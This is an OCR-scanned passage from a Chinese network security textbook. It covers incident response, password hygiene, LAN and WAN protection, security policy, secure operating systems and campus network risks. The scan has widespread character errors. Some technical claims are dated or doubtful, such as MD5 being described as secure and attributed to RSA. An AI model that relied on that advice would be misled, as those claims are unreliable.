第 六 层 的 攻击 包括 远程 用 户 获得 了 特权 文件 的 读 权限 攻击 。 处 于 第 六 层 的 攻击 涉及 远 
程 用 户 如 何 获 取 访 问 内 部 文件 的 权利 问题 。 其 起 因 大 多 是 服务 器 配置 不 当 ,CGI 程序 的 漏 
洞 和 溢出 问题 。 通 常 对 内 部 人 员 的 防范 技术 难度 更 大 。 据 统计 ,对 信息 系统 的 攻击 主要 来 
自 内 部 , 占 85%。 因 为 内 部 人 员 对 网 络 有 更 多 地 了 解 , 有 更 多 的 时 间 和 机 会 来 测试 网 络 安 
全 漏洞 ,并 更 容易 逃避 系统 日 志 的 监视 。 

第 七 层 和 第 八 层 的 攻击 包括 远程 用 户 获 得 了 特权 文件 的 写 权限 、 远 程 用 户 拥有 了 根 
(Root) 权 限 攻 击 。 处 于 第 七 层 和 第 八 层 的 攻击 只 能 利用 那些 不 该 出 现 却 出 现 了 的 漏洞 ,只 
有 这 些 漏 洞 存在 , 才 可 能 出 现 这 种 致命 的 攻击 。 

出 现 第 三 、 四 五 层 的 攻击 表明 网 络 已 经 处 于 很 不 安全 的 状态 ,安全 管理 员 应 该 立即 采 
取 有 效 措施 ,保护 重要 数据 ,进行 日 志 记 录 和 汇报 ,同时 争取 能 够 定位 发 起 攻击 的 地 点 ,具体 
步骤 如 下 : 

。 将 遭受 攻击 的 网 段 分 离 出 来 ,将 此 攻击 范围 限制 在 最 小 的 范围 内 。 

。 记录 当前 时 间 ,备份 系统 日 志 ,检查 记录 损失 范围 和 程度 。 

分 析 是 否 需要 中 断 网 络 连接 。 
让 攻击 行为 继续 进行 。 并 对 已 被 人 侵 的 系统 做 出 备份 ,以 便 留 下 证 据 。 
。 将 入 侵 的 详细 情况 逐 级 向 主管 领导 和 有 关 主 管 部 门 汇报 ; 如 果 系 统 受到 严重 破坏 ， 
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影响 网 络 业务 功能 ,应 立即 调用 备件 恢复 系统 。 
。 尽 可 能 寻找 攻击 的 源头 。 
总 之 ,尽量 不 使 系统 退出 服务 ,同时 尽力 寻找 出 入 侵 者 ,并 通过 法 律 手段 迫使 其 停止 攻 
击 , 才 是 最 有 效 的 防卫 手段 。 


1.4 设置 安全 的 网 络 环境 


通常 操作 系统 在 安装 完毕 后 ,很 多 安全 设置 默认 都 没有 打开 ,需要 系统 管理 员 进 行 手工 
设置 ,来 确保 网 络 和 服务 的 安全 。 


14.1 关于 口令 安全 性 


通过 口令 进行 身份 认证 是 目前 实现 计算 机 安全 的 主要 手段 之 一 。 黑 客 攻 击 目标 时 也 常 
常 把 破译 普通 用 户 的 口令 作为 攻击 的 开始 。 通 常 采 用 字典 穷 举 法 进行 密码 破解 。 在 线 的 密 
码 探测 容易 在 主机 日 志 上 留 下 明显 的 攻击 特征 ,因此 ,更 多 的 时 候 攻击 者 会 利用 其 他 手段 去 
获得 主机 系统 上 的 /etc/passwd 文件 甚至 /etc/shadow 文件 ,然后 在 本 地 对 其 进行 字典 攻击 
或 暴力 破解 。 攻 击 者 并 不 需要 所 有 用 户 的 口令 ,他 们 得 到 几 个 用 户 的 口令 就 能 获取 系统 的 
控制 权 。 

然而 ,有 许多 用 户 对 自己 的 口令 没有 很 好 的 安全 意识 ,使 用 很 容易 被 猜 出 的 口令 ,如 有 
些 是 系统 或 者 主机 的 名 字 ,或 者 是 常见 名 词 如 System、Manager、Admin 等 。 保 持 口令 安全 
的 一 些 要 点 如 下 。 

。 口令 长 度 不 要 小 于 6 位 ,应 同时 包含 字母 和 数字 ,以 及 标点 符号 和 控制 字符 。 

。 口令 中 不 要 使 用 常用 单词 (避免 字典 攻击 ) ,英文 简称 、 个 人 信息 (如 生日 ,名字 、 反 向 

拼写 的 登录 名 房间 中 可 见 的 东西 )、 年 份 以 及 机 器 中 的 命令 等 。 

。 不 要 将 口令 写 下 来 。 

。 不 要 将 口令 存 于 计算 机 文件 中 。 

。 不 要 让 别人 知道 。 

。 不 要 在 不 同系 统 上 ,特别 是 不 同 级 别 的 用 户 上 使 用 同一 口令 。 

。 为 防止 眼 明 手 快 的 人 窃取 口令 ,在 输入 口令 时 应 确认 无 人 在 身边 。 
定期 改变 口令 ,至 少 每 6 个 月 要 改变 一 次 。 

。 在 系统 中 安装 对 口令 文件 进行 隐藏 的 程序 或 设置 。 
在 系统 中 配置 对 用 户口 令 设 置 情况 进行 检测 的 程序 ,并 强制 用 户 定期 改变 口令 。 任 
何 一 个 用 户口 令 的 脆弱 ,都 会 影响 整个 系统 的 安全 。 

最 后 永远 不 要 对 自己 的 口令 过 于 自信 ,也 许 就 在 无 意 当 中 泄露 了 口令 。 定 期 改变 口令 ， 
会 使 自己 遭受 黑客 攻击 的 风险 降 到 一 定 限度 之 内 。 一 旦 发 现 自己 的 口令 不 能 进入 计算 机 系 
统 ,应 立即 向 系统 管理 员 报 告 , 由 管理 员 来 检查 原因 。 

系统 管理 员 也 应 定期 运行 这 些 破译 口令 的 工具 .来 尝试 破译 shadow 文件 ,车 有 用 户 的 
口令 密码 被 破译 ,说 明 这 些 用 户 的 密码 设置 得 过 于 简单 或 有 规律 可 循 ,应 尽快 地 通知 他 们 ， 
及 时 更 改 密码 ,以 防止 黑客 的 人 侵 。 


. 
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142 局 域 网 安全 


目前 的 局 域 网 基本 上 采用 以 广播 为 技术 基础 的 以 太 网 ,任何 两 个 结 点 之 间 的 通信 数据 
包 , 不 仅 为 这 两 个 结 点 的 网 卡 所 接收 ,也 同时 为 处 在 同一 以 太 网 内 的 任何 一 个 结 点 的 网 卡 所 
截取 。 因 此 ,黑客 只 要 接 人 以 太 网 (Ethernety 上 的 任 一 结 点 进行 侦 听 ,就 可 以 捕获 发 生 在 这 
个 以 太 网 上 的 所 有 数据 包 , 这 就 是 以 太 网 所 固有 的 安全 隐患 。 

目前 Internet 上 许多 免费 的 黑客 工具 ,如 SATAN ISSNETCAT 等 ,都 把 以 太 网 侦 听 
作为 最 基本 的 入 侵 手段 。 当 前 局 域 网 安全 的 解决 办 法 有 以 下 几 种 。 


1. 网 络 分 段 


网 络 分 段 通常 被 认为 是 控制 网 络 广播 风暴 的 一 种 基本 手段 ,但 其 实 也 是 保证 网 络 安全 
的 一 项 重要 措施 。 其 目的 就 是 将 非法 用 户 与 敏感 的 网 络 资源 相互 隔离 ,从 而 防止 可 能 的 非 
法 侦 听 。 网 络 分 段 可 分 为 物理 分 段 和 逻辑 分 段 两 种 方式 。 


2. 用 交换 式 集 线 器 代替 共享 式 集线器 


对 局 域 网 的 中 心 交换 机 进行 网 络 分 段 后 ,以 太 网 侦 听 的 危险 仍然 存在 。 这 是 因为 网 络 
最 终 用 户 的 接 入 往往 是 通过 分 支 集线器 而 不 是 中 心 交换 机 ,而 使 用 最 广泛 的 分 支 集线器 是 
共享 式 集线器 , 当 用 户 与 主机 进行 数据 通信 时 ,两 台 机 器 之 间 的 数据 包 又 称 为 单 播 包 
(unicast packet) ,还 是 会 被 同一 台 集线器 上 的 其 他 用 户 所 侦 听 。 

因此 ,应 该 用 交换 式 集线器 代替 共享 式 集线器 ,使 单 播 包 仅 在 两 个 结 点 之 间 传 送 , 从 而 
防止 非法 侦 听 。 


3. 划分 VLAN 


为 了 克服 以 太 网 的 广播 问题 ,除了 上 述 方法 外 ,还 可 以 运用 VLAN( 虚 拟 局 域 网 ) 技 术 ， 
将 以 太 网 通信 变 为 点 到 点 通信 ,防止 大 部 分 基于 网 络 侦 听 技术 的 入 侵 。 

目前 的 VLAN 技术 主要 有 3 种 : 基于 交换 机 端口 的 VLAN、 基 于 结 点 MAC 地 址 的 
VLAN 和 基于 应 用 协议 的 VLAN。 基 于 端口 的 VLAN 虽然 稍 欠 灵活 ,但 比较 成 熟 ,在 实际 
应 用 中 效果 显著 。 基 于 MAC 地 址 的 VLAN 为 移动 计算 提供 了 可 能 性 ,但 同时 也 潜藏 着 遭 
受 MAC 欺诈 攻击 的 危险 。 而 基于 协议 的 VLAN ,理论 上 非常 理想 ,但 实际 应 用 尚 不 成 熟 。 

在 集中 式 网 络 环境 下 ,通常 将 中 心 的 所 有 主机 系统 集中 到 一 个 VLAN 里 ,在 这 个 
VLAN 里 不 允许 有 任何 用 户 结 点 ,从 而 较 好 地 保护 了 敏感 的 主机 资源 。 在 分 布 式 网 络 环境 
下 ,可 以 按 机 构 或 部 门 的 设置 来 划分 VLAN。 各 部 门 内 部 的 所 有 服务 器 和 用 户 结 点 都 在 各 
自 的 VLAN 内 , 互 不 侵扰 。 

VLAN 内 部 的 连接 采用 交换 机 进行 通信 ,而 VLAN 与 VLAN 之 间 的 连接 则 采用 路 由 器 
进行 通信 。 目 前 大 多 数 的 交换 机 都 支持 RIP 和 OSPF 这 两 种 国际 标准 的 路 由 协议 。 如 果 有 
特殊 需要 ,必须 使 用 其 他 路 由 协议 (如 Cisco 公司 的 EIGRP 或 支持 DECnet 的 IS 一 IS) ,也 
可 以 用 外 接 的 多 以 太 网 口 路 由 器 来 代替 交换 机 ,实现 VLAN 之 间 的 路 由 功能 。 

无 论 是 交换 式 集线器 还 是 VLAN 交换 机 ,都 需要 以 交换 技术 为 核心 ,它们 在 控制 广播 、 
防止 黑客 上 非常 有 效 ,但 同时 也 给 一 些 基 于 广播 原理 的 入 侵 监 控 技 术 和 协议 分 析 技 术 带 来 
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了 麻烦 。 如 果 局 域 网 内 存在 了 这 样 的 入 侵 监控 设备 或 协议 分 析 设备 ,就 必须 选用 特殊 的 带 
有 SPAN(Switch Port Analyzer) 功 能 的 交换 机 。 这 种 交换 机 人 允许 系统 管理 员 将 全 部 或 某 
些 交换 端口 的 数据 包 映射 到 指定 的 端口 上 ,提供 给 接 在 这 一 端口 上 的 入 侵 监 控 设 备 或 协议 
分 析 设 备 。 


143 广域网 安全 


下 面 讨论 广域网 的 安全 问题 ,由 于 广域网 大 多 采用 公 网 来 进行 数据 传输 ,信息 在 广域网 
上 传输 时 被 截取 和 利用 的 可 能 性 就 比 在 局 域 网 上 大 得 多 。 保 护 在 广域网 上 发 送 和 接收 信息 
的 安全 ,通常 要 做 到 : 

。 除了 发 送 方 和 接收 方 外 ,其 他 人 是 无 法 知悉 的 (隐私 性 ); 

。 传输 过 程 中 不 被 自 改 (真实 性 ); 

。 发 送 方 能 确 知 接收 方 不 是 假冒 的 ( 非 伪 装 性 ); 

。 发 送 方 不 能 和 否认 自己 的 发 送行 为 (不 可 抵赖 性 ) 。 

为 了 达到 以 上 安全 目的 ,广域网 通常 采用 以 下 安全 解决 办 法 。 


1. 加 密 技术 


加 密 型 网 络 安全 技术 的 基本 思想 是 不 依赖 于 网 络 中 数据 通道 的 安全 性 来 实现 网 络 系统 
的 安全 ,而 是 通过 对 网 络 数据 的 加 密 来 保障 网 络 的 安全 可 靠 性 。 数 据 加 密 技 术 可 以 分 为 三 
类 , 即 对 称 型 加 密 不 对 称 型 加 密 和 不 可 逆 加 密 。 

其 中 不 可 逆 加 密 算法 不 存在 密 钥 保管 和 分 发 问题 ,适用 于 分 布 式 网 络 系统 ,但 是 其 加 密 
计算 量 非常 大 ,所 以 通常 在 数据 量 有 限 的 情形 下 使 用 。 计 算 机 操作 系统 中 的 口令 就 是 利用 
不 可 道 加 密 算法 加 密 的 。 近 年 来 , 随 着 计算 机 系统 性 能 的 不 断 提高 ,不 可 逆 加 密 算法 的 应 用 
逐渐 增加 ,常用 的 如 RSA 公司 的 MD5 和 美国 国家 标准 局 的 SHS。Cisco 路 由 器 中 有 两 种 
口令 加 密 方 式 : Enable Secret 和 Enable Password。 其 中 ,Enable Secret 就 采用 了 MD5 不 
可 道 加 密 算法 ,因而 目前 尚未 发 现 除 字典 攻击 法 外 的 其 他 破解 方法 。 而 Enable Password 
则 采用 了 非常 脆弱 的 加 密 算法 ( 即 简 单 地 将 口令 与 一 个 常数 进行 与 或 运算 )。 因 此 建议 在 重 
要 数据 上 不 用 Enable Password 加 密 方式 。 


2. VPN 技术 


VPN( 虚 拟 专 网 ) 技 术 的 核心 是 采用 隧道 技术 ,将 企业 专 网 的 数据 加 密封 装 后 ,通过 虚 
拟 的 公 网 隧道 进行 传输 ,从 而 防止 敏感 数据 的 被 窃 。VPN 可 以 在 Internet、 服 务 提供 商 的 
IP、 帧 中 继 或 ATM 网 上 建立 。 企 业 通 过 公 网 建立 VPN ,就 如 同 通过 自己 的 专用 网 建立 内 
部 网 一 样 ,享有 较 高 的 安全 性 ,优先 性 、 可 靠 性 和 可 管理 性 ,而 其 建立 周期 ,投入 资金 和 维护 
费用 却 大 大 降低 ,同时 还 为 移动 计算 提供 了 可 能 。 因 此 随 着 公 网 质量 的 不 断 提高 ,VPN 技 
术 也 得 到 了 广泛 的 应 用 。 

但 应 该 指出 的 是 ,目前 VPN 技术 的 许多 核心 协议 ,如 L2TP、IPSec 等 ,都 还 未 形成 通用 
标准 。 这 就 使 得 不 同 的 VPN 服务 提供 商 之 间 、VPN 设备 之 间 的 互 操作 性 成 为 问题 。 因 此 ， 
企业 在 VPN 建 网 选 型 时 ,一 定 要 慎重 选择 VPN 服务 提供 商 和 VPN 设备 。 
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3. 身份 认证 技术 


对 于 从 外 部 拨号 访问 总 部 内 部 网 的 用 户 , 由 于 使 用 公共 电话 网 进行 数据 传输 所 带 来 的 
风险 ,必须 更 加 严格 控制 其 安全 性 。 一 种 常见 的 做 法 是 采用 身份 认证 技术 ,对 拨号 用 户 的 身 
份 进行 验证 并 记录 完备 的 登录 日 志 。 较 常用 的 身份 认证 技术 有 Cisco 公司 提出 的 
TACACS+ 以 及 业界 标准 RADIUS 。 


144 制订 安全 策略 


制订 安全 策略 是 非常 有 必要 的 ,虽然 没有 绝对 的 把 握 阻 止 全 部 的 侵入 行为 ,但 是 一 个 好 
的 安全 策略 至 少 可 以 减少 侵入 行为 的 发 生 次 数 ,即使 发 生 了 也 可 以 最 快 地 做 出 正确 反应 ,最 
大 程度 地 减少 经 济 损失 。 

系统 管理 员 在 制订 安全 策略 的 具体 内 容 时 有 如 下 几 项 安全 原则 。 


1. 最 小 权限 (least privilege) 
用 户 不 需要 使 用 的 一 些 功能 ,就 不 要 赋予 相应 的 权限 。 
2. 多 层 防御 


不 能 只 依赖 一 种 安全 结构 ,如 在 增强 服务 器 的 安全 策略 的 同时 ,也 要 注意 防火 墙 等 设备 
的 升级 和 维护 。 


3. 堵塞 点 (choke point) 

尽量 把 攻击 者 引入 一 条 死胡同 ,让 系统 记录 下 攻击 者 的 所 有 操作 。 
4. 考虑 最 薄弱 的 点 (weakest link) 

找 出 整个 网 络 中 最 薄弱 的 地 方 , 并 采取 相应 的 防范 措施 。 

5. 团队 合作 (universal particpation) 


大 部 分 安全 系统 都 需要 各 个 人 员 的 配合 ,如 果 有 一 仆 忽 或 者 不 配合 ,那么 攻击 者 就 有 
可 能 通过 这 台 计 算 机 ,从 内 部 来 攻击 其 他 的 计算 机 。 


6. 保持 简单 (simplicity) 
尽量 降低 系统 的 复杂 度 , 越 复杂 的 系统 越 容易 隐藏 一 些 安全 问题 ,建议 不 要 在 一 台 服 务 
器 上 配置 超过 两 种 以 上 的 应 用 。 


1.5 安全 操作 系统 简介 


操作 系统 是 信息 系统 安全 的 基础 设施 ,在 信息 安全 方面 起 着 决定 性 的 作用 。 信 息 系统 
安全 在 硬件 方面 关键 是 芯片 ,在 软件 方面 关键 则 是 操作 系统 。 本 节 主 要 讨论 操作 系统 方面 
的 安全 问题 。 
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没有 操作 系统 的 安全 保障 ,其 他 的 安全 措施 无 法 发 挥 其 应 有 的 安全 防范 作用 。 如 防火 
墙 等 安全 产品 ,如果 基 于 不 安全 的 操作 系统 平台 上 ,其 安全 功能 是 可 以 被 旁 路 屏蔽 的 。 

此 外 ,操作 系统 漏洞 本 身 给 网 络 信息 安全 带 来 了 很 大 问题 。 用 户 不 能 幻想 依靠 防 病毒 
产品 彻底 解决 安全 问题 。 实 际 上 ,要 彻底 解决 病毒 人 侵 等 安全 问题 还 需要 安全 操作 系统 。 

安全 操作 系统 是 根据 国家 标准 ,正式 通过 国家 权威 机 构 评测 的 操作 系统 。 达 到 国标 第 
3 级 以 上 的 操作 系统 , 才 是 真正 意义 上 的 安全 操作 系统 。 每 种 操作 系统 都 有 不 同 的 安全 级 
别 , 所 以 不 能 笼统 比较 操作 系统 的 安全 性 。 需 要 说 明 的 是 ,并 不 是 操作 系统 越 安全 越 好 , 安 
全 性 和 实用 性 是 一 个 矛盾 的 双方 。 用 户 对 安全 性 的 需求 不 同 , 这 需要 在 安全 性 和 实用 性 之 
间 找 一 个 平衡 点 。 对 于 普通 用 户 和 客户 端 ,安全 性 要 求 不 高 ,注重 实用 性 ; 但 对 于 安全 性 要 
求 较 高 的 用 户 和 服务 器 ,适宜 采用 适当 级 别 的 安全 操作 系统 。 

由 于 安全 操作 系统 的 重要 性 ,我 国 要 拥有 自主 知识 产权 的 安全 操作 系统 。 从 目前 来 看 ， 
Microsoft 公司 统治 桌面 操作 系统 市 场 可 能 还 有 相当 长 的 时 期 ,而 在 Windows 的 基础 上 做 
它 的 安全 操作 系统 版 本 也 只 能 是 Microsoft 公司 自己 来 做 ,别人 很 难 做 到 。 而 从 技术 角度 
讲 , 在 Linux 开放 源 代码 的 基础 上 做 安全 性 研究 和 实践 ,就 不 用 把 资源 花费 在 非 核心 的 安全 
技术 上 ,上 且 更 容易 一 些 。 此 外 源 代码 开放 提供 了 很 好 的 发 展 机 过 ,对 于 软件 产业 的 发 展 是 个 
促进 。 

开放 源 代码 对 信息 安全 是 非常 有 益 的 ,但 这 并 不 意味 着 开放 源 代码 软件 就 是 安全 的 。 
开放 源 代码 是 保障 信息 安全 一 个 非常 有 效 的 手段 ,但 不 是 唯一 的 手段 。 一 个 软件 不 管 是 不 
是 开放 源 代码 ,只 有 根据 标准 ,通过 信息 技术 安全 性 评估 才能 认为 是 否 是 安全 的 。 

中 国信 息 系统 安全 基础 设施 建设 比较 薄弱 ,尤其 是 安全 操作 系统 ,由 于 认识 上 的 不 足 和 
没有 明显 的 经 济 利益 等 因素 ,没有 得 到 足够 的 重视 和 发 展 。 


1.6 网 络 管理 员 的 素质 要 求 


下 面 简要 介绍 一 下 成 为 网 络 管理 员 所 需要 的 基本 素质 ,这 里 列举 的 内 容 不 一 定 全 面 , 但 
是 希望 能 对 读者 有 一 定 的 指导 作用 。 

@ 深入 地 了 解 过 至 少 两 个 操作 系统 ,主动 学 习 UNIX 操作 系统 。 能 够 熟练 配置 主机 的 
安全 选项 和 设置 ,及 时 了 解 已 公布 的 安全 漏洞 ,并 能 够 及 时 下 载 相应 的 补丁 程序 。 

@ 对 TCP/IP 协议 族 有 透彻 的 了 解 ,这 是 任何 一 个 合格 的 网 络 安全 管理 员 的 必 备 素 
质 。 且 不 仅 停留 在 Internet 基本 构造 等 基础 知识 上 ,必须 能 够 根据 侦 测 到 的 网 络 信息 数据 
进行 准确 的 分 析 , 达 到 安全 预警 , 有效 制止 攻击 和 发 现 攻 击 者 等 防御 目的 。 

@ 熟练 使 用 C、C++ 、Perl 等 语言 进行 编程 ,这 是 基本 要 求 。 因 为 许多 基本 的 安全 工具 
是 用 这 些 语 言 的 某 一 种 编写 的 。 网 络 安全 管理 员 至 少 能 正确 地 解释 、 编 译 和 执行 这 些 程序 。 

@ 不 仅 要 了 解 自 己 的 机 器 和 局 域 网 ,还 必须 熟悉 Internet。 要 不 断 地 了 解 网 络 发 展 的 
最 新 技术 。 

名 熟练 使 用 英语 读 写 , 能 阅读 相关 英文 版 安全 文档 。 

@ 平时 注意 收集 网 络 的 各 种 信息 ,如 硬件 ,应 识别 其 构造 .制造 商 \ 工 作 模式 以 及 每 台 
工作 站 、 路 由 器 ,集线器 、 网 卡 的 型 号 等 ; 软件 ,网 络 软 件 的 所 有 类 型 以 及 它们 的 版 本 号 ; 网 
络 正 在 使 用 的 协议 ; 网 络 规划 ,如 工作 站 的 数量 、 网 段 的 划分 、 网 络 的 扩展 ; 其 他 信息 ,例如 
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网 络 内 部 以 前 一 直 实 施 中 的 安全 策略 的 概述 、 曾 遭受 过 的 安全 攻击 的 历史 记录 等 。 


1.7 校园 网 络 的 安全 


国内 高 校 校 园 网 的 安全 问题 由 来 已 久 , 由 于 意识 与 资金 方面 的 原因 ,以 及 对 技术 的 偏好 
和 运营 意识 的 不 足 , 普 遍 都 存在 “ 重 技术 、 轻 安全 、 轻 管理 "的 现象 ,常常 只 是 在 内 部 网 与 互联 
网 之 间 放 一 个 防火 墙 就 万 事 大 吉 , 有 些 学 校 甚至 在 没有 任何 防护 措施 下 直接 连接 互联 网 ,这 
就 给 病毒 .黑客 提供 了 充分 施展 身手 的 空间 ,导致 整个 校园 网 处 于 危险 之 中 。 

校园 网 的 安全 威胁 既 有 来 自 校内 的 ,也 有 来 自 校 外 的 ,只 有 将 技术 和 管理 都 重视 起 来 ， 
才能 切实 构筑 一 个 安全 的 校园 网 。 


171 校园 网 安全 特点 


高 等 教育 系统 和 科研 机 构 是 互联 网 诞生 的 摇篮 ,也 是 最 早 的 应 用 环境 。 各 国 的 高 等 教 
育 系统 都 是 最 早 建设 和 应 用 互联 网 技术 的 行业 之 一 ,中 国 的 高 校 校 园 网 一 般 都 最 先 应 用 最 
先进 的 网 络 技术 ,网 络 应 用 广泛 ,用 户 群 密集 而 且 活跃 。 然 而 校园 网 由 于 自身 的 特点 也 是 安 
全 问题 比较 突出 的 地 方 , 安 全 管理 也 更 为 复杂 、 困 难 。 

与 政府 或 企业 网 相 比 ,高 校 校园 网 的 以 下 特点 导致 安全 管理 非常 复杂 。 


1. 校园 网 的 速度 快 和 规模 大 


高 校 校 园 网 是 最 早 的 宽带 网 络 , 普 遍 使 用 的 以 太 网 技术 决定 了 校园 网 最 初 的 带宽 不 低 
于 10Mb/s, 目 前 普遍 使 用 了 百 兆 \ 千 焰 甚 至 万 焰 实现 园区 主干 互联 。 校 园 网 的 用 户 群 体 一 
般 较 大 , 少 则 数 千 人 、 多 则 数 万 人 。 中 国 的 高 校 学 生 一 般 是 集中 住宿 制 ,因而 用 户 群 比较 密 
集 。 正 是 由 于 高 带宽 和 大 用 户 量 的 特点 ,网 络 安全 问题 一 般 蓝 延 快 , 对 整个 校园 网 络 的 影响 
比较 严重 。 

2. 校园 网 中 的 计算 机 系统 管理 比较 复杂 


校园 网 中 的 计算 机 系统 的 购置 和 管理 情况 非常 复杂 ,如 学 生 宿 舍 中 的 计算 机 一 般 是 学 
生 自己 花 钱 购买 .自己 维护 。 这 种 情况 下 要 求 所 有 的 端 系统 实施 统一 的 安全 政策 (如 安装 防 
病毒 软件 .设置 可 靠 的 口令 ) 是 非常 困难 的 。 由 于 没有 统一 的 资产 管理 和 设备 管理 ,出 现 安 
全 问题 后 通常 无 法 分 清 责任 。 比 较 典 型 的 现象 是 ,用 户 的 计算 机 接 入 校园 网 后 感染 病毒 , 反 
过 来 这 台 感 染病 毒 的 计算 机 又 影响 了 校园 网 的 运行 .于 是 出 现 端 系统 用 户 和 网 络 管理 员 相 
互 指责 的 现象 。 更 有 些 计算 机 甚至 服务 器 系统 建设 完毕 之 后 无 人 管理 ,被 攻击 者 攻破 作为 
攻击 的 跳板 也 无 人 觉察 。 


3. 活跃 的 用 户 群 体 


高 等 学 校 的 学 生 通 常 是 最 活跃 的 网 络 用 户 , 对 网 络 新 技术 充满 好 奇 ,勇于 尝试 。 有 些 学 
生 会 尝试 使 用 网 上 学 到 的 甚至 自己 研究 的 各 种 攻击 技术 ,可 能 对 网 络 造成 一 定 的 影响 和 
破坏 。 
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4. 开放 的 网 络 环境 


由 于 教学 和 科研 的 特点 决定 了 校园 网 络 环境 应 该 是 开放 的 、 管 理 也 是 较为 宽松 的 。 例 
如 ,企业 网 可 以 限制 允许 Web 浏览 和 电子 邮件 的 流量 ,甚至 限制 外 部 发 起 的 连接 不 允许 进 
入 防火 墙 , 但 是 在 校园 网 环境 下 通常 是 行 不 通 的 ,至 少 在 校园 网 的 主干 不 能 实施 过 多 的 限 
制 ,否则 一 些 新 的 应 用 、 新 的 技术 很 难 在 校园 网 内 部 实施 。 


5. 有 限 的 投入 


校园 网 的 建设 和 管理 通常 都 轻视 了 网 络 安全 ,特别 是 管理 和 维护 人 员 方 面 的 投入 明显 
不 足 。 在 中 国 大 多 数 的 校园 网 中 ,通常 只 有 网 络 中 心 的 少数 工作 人 员 ,他 们 只 能 维护 网 络 的 
正常 运行 ,无 暇 顾及 ,也 没有 条 件 管理 和 维护 数 万 台 计算 机 的 安全 ,而 院 , 系 一 级 的 专职 的 计 
算 机 系统 管理 员 对 计算 机 系统 的 安全 是 非常 重要 的 。 


6. 盗版 资源 泛滥 


由 于 缺乏 版 权 意识 ,盗版 软件 .影视 资源 在 校园 网 中 被 普遍 使 用 ,这 些 软 件 的 传播 一 方 
面 占用 了 大 量 的 网 络 带 宽 , 另 一 方面 也 给 网 络 安 全 带 来 了 一 定 的 隐患 。 例 如 ,Microsoft 公 
司 对 盗版 的 Windows XP 操作 系统 的 更 新 做 了 限制 ,盗版 安装 的 计算 机 系统 今后 会 留 下 大 
量 的 安全 漏洞 。 另 一 方面 ,从 网 络 上 随意 下 载 的 软件 中 可 能 隐藏 木马 后 门 等 恶意 代码 , 许 
多 系统 因此 被 攻击 者 侵入 和 利用 。 


172 校园 网 安全 的 隐患 


随 着 校园 网 规模 的 不 断 扩大 ,网 络 安全 事件 影响 日 益 广泛 ,网 络 安全 也 越 来 越 难 以 保 
障 ,仅仅 靠 少 数 几 个 网 络 管理 员 和 几 台 防火 墙 是 远 远 不 够 ,重要 的 是 提高 用 户 整体 的 安全 意 
识 。 就 长 期 而 言 ,校园 网 络 中 最 突出 的 仍然 是 垃圾 邮件 ,不 规范 的 程序 代码 和 内 部 安全 三 大 
问题 。 下 面 详细 介绍 这 三 大 问题 。 


1. 垃圾 邮件 


垃圾 邮件 大 量 产生 的 原因 是 : 垃圾 邮件 的 发 送 者 可 以 利用 “最 小 的 成 本 "获得 最 大 的 利 
益 ,或 者 采取 网 络 钓鱼 的 方式 入 侵 并 获得 被 害 者 的 敏感 数据 。 校 园 网 中 巨大 的 用 户 数 量 以 
及 用 户 淡薄 的 防护 意识 都 使 其 成 为 了 最 严重 的 受害 者 之 一 。 

除了 商业 利益 的 驱使 ,病毒 .蠕虫 脚本 的 传播 也 是 垃圾 邮件 产生 的 原因 ,垃圾 邮件 的 泛 
滥 使 整个 校园 网 的 运行 效率 变 得 越 来 越 低下 。 

根据 调查 ,2006 年 7 月 以 前 ,40% 的 区 县 级 别 的 教育 网 管理 机 构 和 两 千 台 以 上 的 校园 
网 都 购买 了 相关 的 防 垃圾 邮件 产品 以 及 服务 。 在 本 书后 面 的 章节 中 会 介绍 一 款 校园 网 邮件 
系统 。 


2. 不 规范 的 程序 代码 


随 着 教育 信息 化 的 大 力 推进 ,教育 信息 网 .学科 资源 网 站 、 区 域 性 的 教育 门户 网 站 大 量 
地 建立 起 来 。 网 站 的 开发 大 多 是 由 在 校 的 师 生 完成 的 ,在 建立 网 站 的 时 候 ,开发 者 考虑 最 多 
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的 是 内 容 的 丰富 性 和 宣传 效应 以 及 访问 量 , 但 是 却 忽视 了 网 站 代码 的 安全 性 。 

这 是 因为 , 随 着 B/S 模式 应 用 开发 的 发 展 ,使 用 这 种 模式 编写 应 用 程序 的 程序 员 也 越 
来 越 多 ,一 部 分 程序 员 在 编写 代码 的 时 候 , 没 有 对 用 户 输入 数据 的 合法 性 进行 判断 ; 使 应 用 
程序 存在 安全 隐患 。 许 多 师 生 通 过 简单 的 学 习 和 培训 就 可 以 利用 ASP 语言 等 建立 动态 管 
理 的 网 站 ,而 非 专业 人 员 在 设计 中 没有 对 网 站 的 编写 规范 进行 安全 检查 ,从 而 暴露 出 数据 库 
的 真实 参数 ,导致 网 站 容易 受到 攻击 。 这 就 在 校园 网 安全 堡垒 中 制造 了 被 人 攻击 的 软肋 (或 
者 漏洞 ) 。 


3. 内 部 安全 


教育 网 信息 安全 领域 中 存在 的 另 一 个 普遍 性 的 问题 就 是 “ 重 外 轻 内 ”, 用 户 将 注意 力 集 
中 于 如 何 防 范 那 些 来 自 网 络 外 部 的 恶意 攻击 ,但 是 实际 情况 是 ,高 校 校 园 网 有 很 多 学 生 的 计 
算 机 相关 技术 水 平 非常 高 ,甚至 超 乎 管理 人 员 的 想象 。 在 这 种 情况 下 ,高 校 如 何 能 够 保证 网 
络 的 安全 运行 ,同时 又 能 提供 丰富 的 网 络 资源 ,达到 办 公 、 教 学 以 及 学 生 上 网 的 多 种 需求 成 
为 了 一 个 难题 。 相 比 来 自 外 部 的 攻击 ,来自 局 域 网 内 的 攻击 威胁 更 大 。 由 此 可 见 ,目前 很 多 
高 校 校 园 网 的 安全 环境 可 以 用 “内 外 交 困 "来 形容 。 

近年 来 注重 校园 网 内 网 安全 的 呼声 越 来 越 高 。 


173 校园 网 安全 重点 在 于 管理 


针对 目前 高 校 校园 网 安全 现状 的 认识 与 理解 ,要 想 提高 校园 网 络 的 安全 性 ,重点 是 提高 
和 完善 校园 网 的 管理 机 制 。 以 下 是 校园 网 需要 完善 和 补充 的 管理 机 制 。 


1. 规范 出 口 管理 


实施 校园 网 的 整体 安全 架构 ,必须 解决 多 出 口 的 问题 。 对 于 出 口 进行 规范 统一 的 管理 ， 
为 校园 网 的 安全 提供 最 基础 的 保障 。 


2. 配备 完整 系统 的 网 络 安全 设备 


在 网 内 和 网 外 接口 处 配置 一 定 的 网 络 安 全 设备 就 可 防止 大 部 分 的 攻击 和 破坏 ,一 般 包 
括 : 防火 墙 , 人 侵 检测 系统 、 漏 洞 扫描 系统 、 网 络 版 的 防 病毒 系统 等 。 另 外 ,通过 配置 安全 产 
品 可 以 实现 对 校园 网 络 进行 系统 的 防护 、 预 警 和 监控 ,对 大 量 的 非法 访问 和 不 健康 信息 起 到 
